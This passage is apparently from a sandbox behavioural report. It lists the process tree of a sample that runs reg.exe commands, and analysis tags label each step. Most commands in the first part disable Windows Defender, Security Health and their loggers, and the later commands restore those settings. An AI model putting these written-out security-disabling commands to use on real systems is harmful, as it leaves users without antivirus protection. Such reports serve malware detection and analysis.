    reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f"
    3⤵
    PID:3716
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:2228
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    - Modifies registry key
    PID:3604
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:268
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:3484
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:2220
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:3884
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:3320
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    - Modifies registry key
    PID:3760
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:3456
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:1688
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:3504
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
    3⤵
    PID:3372
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:3028
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
    3⤵
    PID:3492
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:2456
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
    3⤵
    PID:2840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /f
  2⤵
  PID:3144
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3356
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /f"
  2⤵
  PID:2272
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /f
    3⤵
    PID:3392
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /f"
  2⤵
  PID:3748
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /f
    3⤵
    PID:3264
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /f"
  2⤵
  PID:3488
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /f
    3⤵
    PID:3636
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /f"
  2⤵
  PID:3416
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /f
    3⤵
    PID:3784
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /f"
  2⤵
  PID:2132
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /f
    3⤵
    PID:3564
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /f"
  2⤵
  PID:3024
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /f
    3⤵
    PID:3920
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /f"
  2⤵
  PID:820
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /f
    3⤵
    PID:3944
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /f
  2⤵
  PID:1356
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /f
    3⤵
    PID:932
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /f
  2⤵
  PID:2260
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /f
    3⤵
    PID:3952
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /f"
  2⤵
  PID:4088
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /f
    3⤵
    PID:3424
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f"
  2⤵
  PID:1148
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f
    3⤵
    PID:2716
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /f"
  2⤵
  PID:1104
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /f
    3⤵
    PID:3924
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /f"
  2⤵
  PID:3996
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /f
    3⤵
    PID:2784
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /f"
  2⤵
  PID:2684
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /f
    3⤵
    PID:3936
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /f"
  2⤵
  PID:2408
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /f
    3⤵
    PID:3940
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /f"
  2⤵
  PID:1836
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /f
    3⤵
    PID:264
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /f"
  2⤵
  PID:1796
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /f
    3⤵
    PID:1712
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /f"
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /f
    3⤵
    PID:3696
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /f"
  2⤵
  PID:3060
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /f
    3⤵
    PID:2180
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /f"
  2⤵
  PID:3916
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /f
    3⤵
    PID:868
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f"
  2⤵
  PID:2556
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f
    3⤵
    PID:1956
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /f"
  2⤵
  PID:1140
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /f
    3⤵
    PID:3132
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /f"
  2⤵
  PID:2852
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /f
    3⤵
    PID:1780
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /f"
  2⤵
  PID:2748
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /f
    3⤵
    PID:1496
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /f"
  2⤵
  PID:2404
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /f
    3⤵
    PID:1044
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /f"
  2⤵
  PID:3120
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /f
    3⤵
    PID:2676
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /f"
  2⤵
  PID:2668
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /f
    3⤵
    PID:3708
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /f"
  2⤵
  PID:2964
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /f
    3⤵
    PID:1616
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /f"
  2⤵
  PID:2832
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /f
    3⤵
    PID:3204
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /f"
  2⤵
  PID:3116
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /f
    3⤵
    PID:4180
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /f"
  2⤵
  PID:316
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /f
    3⤵
    PID:4120
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /f"
  2⤵
  PID:3420
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /f
    3⤵
    PID:4112
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /f"
  2⤵
  PID:3056
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /f
    3⤵
    PID:1756
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /f"
  2⤵
  PID:4072
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /f
    3⤵
    PID:4144
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /f"
  2⤵
  PID:1784
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /f
    3⤵
    PID:3452
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2236
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /f
    3⤵
    PID:2992
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /f"
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /f
    3⤵
    PID:4008
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /f"
  2⤵
  PID:3104
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /f
    3⤵
    PID:4108
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /f"
  2⤵
  PID:3112
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /f
    3⤵
    PID:4128
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /f"
  2⤵
  PID:3148
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /f
    3⤵
    PID:4104
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /f"
  2⤵
  PID:3852
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /f
    3⤵
    PID:3340
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /f"
  2⤵
  PID:4036
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /f
    3⤵
    PID:5016
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /f"
  2⤵
  PID:3568
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /f
    3⤵
    PID:4136
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /f"
  2⤵
  PID:2808
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /f
    3⤵
    PID:3268
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /f"
  2⤵
  PID:3788
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /f
    3⤵
    PID:4340
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3844
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /f
    3⤵
    PID:1692
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /f"
  2⤵
  PID:4064
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /f
    3⤵
    PID:1692
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /f"
  2⤵
  PID:2328
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /f
    3⤵
    PID:5100
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /f"
  2⤵
  PID:2760
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /f
    3⤵
    PID:5940
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /f"
  2⤵
  PID:916
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /f
    3⤵
    PID:5772
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /f"
  2⤵
  PID:4068
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /f
    3⤵
    PID:3388
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /f"
  2⤵
  PID:2312
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /f
    3⤵
    PID:5340
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /f"
  2⤵
  PID:4040
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /f
    3⤵
    PID:4896
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:1152
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 3 /f
    3⤵
    PID:6052
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 2 /f
  2⤵
  PID:2188
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 2 /f
    3⤵
    - Modifies security service
    PID:6132
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:2064
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 0 /f
    3⤵
    PID:5972
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:3340
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 3 /f
    3⤵
    - Modifies registry key
    PID:3464
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:3312
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 0 /f
    3⤵
    PID:6004
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:3624
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 0 /f
    3⤵
    PID:3588
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:2076
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 3 /f
    3⤵
    - Modifies Security services
    PID:6036
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:1164
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 3 /f
    3⤵
    PID:2664
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 1 /f
  2⤵
  PID:3444
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 1 /f
    3⤵
    PID:660
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 1 /f
  2⤵
  PID:3912
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 1 /f
    3⤵
    PID:4904
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:1920
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
    3⤵
    PID:4364
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /t REG_EXPAND_SZ /d %%windir%%\system32\SecurityHealthSystray.exe /f
  2⤵
  PID:3744
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /t REG_EXPAND_SZ /d %C:\Windows%\system32\SecurityHealthSystray.exe /f
    3⤵
    - Adds Run key to start application
    PID:524
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c %SYSTEMROOT%\System32\OneDriveSetup.exe
  2⤵
  PID:3440
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c %SystemRoot%\SysWOW64\OneDriveSetup.exe
  2⤵
  PID:1408
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f"
